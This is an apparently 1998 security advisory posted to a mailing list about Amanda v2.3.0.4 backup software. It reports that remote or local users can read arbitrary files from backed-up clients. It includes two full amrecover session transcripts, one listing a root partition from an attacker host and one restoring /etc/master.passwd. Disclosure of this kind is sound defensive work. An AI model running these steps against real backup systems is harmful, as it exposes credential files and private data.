CPIO-SN #11980105: Amanda v2.3.0.4 Backup Software

Gale Pedowitz (gale@DARPANET.NET)
Sat, 10 Jan 1998 11:01:43 -0800

Cheers, all,

The notice that was sent out at 4AM today was released in error. This is
the actual release.

CPIO apologizes for the confusion.

--

**************** CPIO Security Notice **************** Issue 11: 980105 Topic: Amanda v2.3.0.4 Backup Software Platforms: Platform-independent ************** http://www.darpanet.net **************

This release concerns vulnerabilities in the Amanda backup software suite; remote users may exploit these vulnerabilities to view arbitrary files on Amanda network backup clients.

SUMMARY

There are several security problems in the current version of Amanda. The vulnerabilities detailed here are two of many discovered by an OpenBSD security audit. The Amanda core team has been contacted.

I. Any attacker can connect remotely to an index server, thus permitting access to any machine being backed up. II. A malicious local user may access any partition or any files on a machine backed up through the network via Amanda.

EXAMPLE I: index.servername.net | the affected index server remote.attacker.org | attacker's host staff | a machine being backed up by the index server

[remote%] amrecover -s index.servername.net AMRECOVER Version 1.0. Contacting server on index.servername.net ... 220 index.servername.net AMANDA index server (1.0) ready. Setting restore date to today (1997-12-24) 200 Working date set to 1997-12-24. 200 Config set to DailySet1. 501 No index records for host: remote.attacker.org. Invalid? amrecover> sethost staff 200 Dump host set to staff. amrecover> setdisk wd0a 200 Disk set to wd0a amrecover> ls [ list of root partion ]

EXAMPLE II: users | users shell machine being backed up staff | staff machine being backed up

[users%] amrecover AMRECOVER Version 1.0. Contacting server on index.servername.net ... 220 index.servername.net AMANDA index server (1.0) ready. Setting restore date to today (1997-12-24) 200 Working date set to 1997-12-24. 200 Config set to DailySet1. 200 Dump host set to users. Divided $CWD into directory /joey on disk wd0f mounted at /home/home1. 200 Disk set to wd0f. amrecover> setdisk wd0a 200 Disk set to wd0a amrecover> cd etc amrecover> add master.passwd Added /etc/master.passwd amrecover> extract Extracting files using tape drive /dev/nrst0 on host index.servername.net. The following tapes are needed: DAILY6 Restoring files into directory /home/home1/joey Continue? [Y/n]: y Load tape DAILY6 now Continue? [Y/n]: y amrecover> quit [local%] pwd /home/home1/joey [local%] ls master.passwd master.passwd

AFFECTED PLATFORMS AND NOTES

This vulnerability is related to problems in the software itself, and appears to be platform-independent. Known (tested) afflicted platforms include OpenBSD and Linux.

FIXES

A patch from the authors is forthcoming. The only known workaround at this time is to completely disable Amanda.

CREDITS

This vulnerability was discovered and described by Joey Novell <joey@cpio.org>. Gale Pedowitz <gale@cpio.org> edited and prepared this release. Other contributors include Jonathan Katz <jkatz@cpio.org>.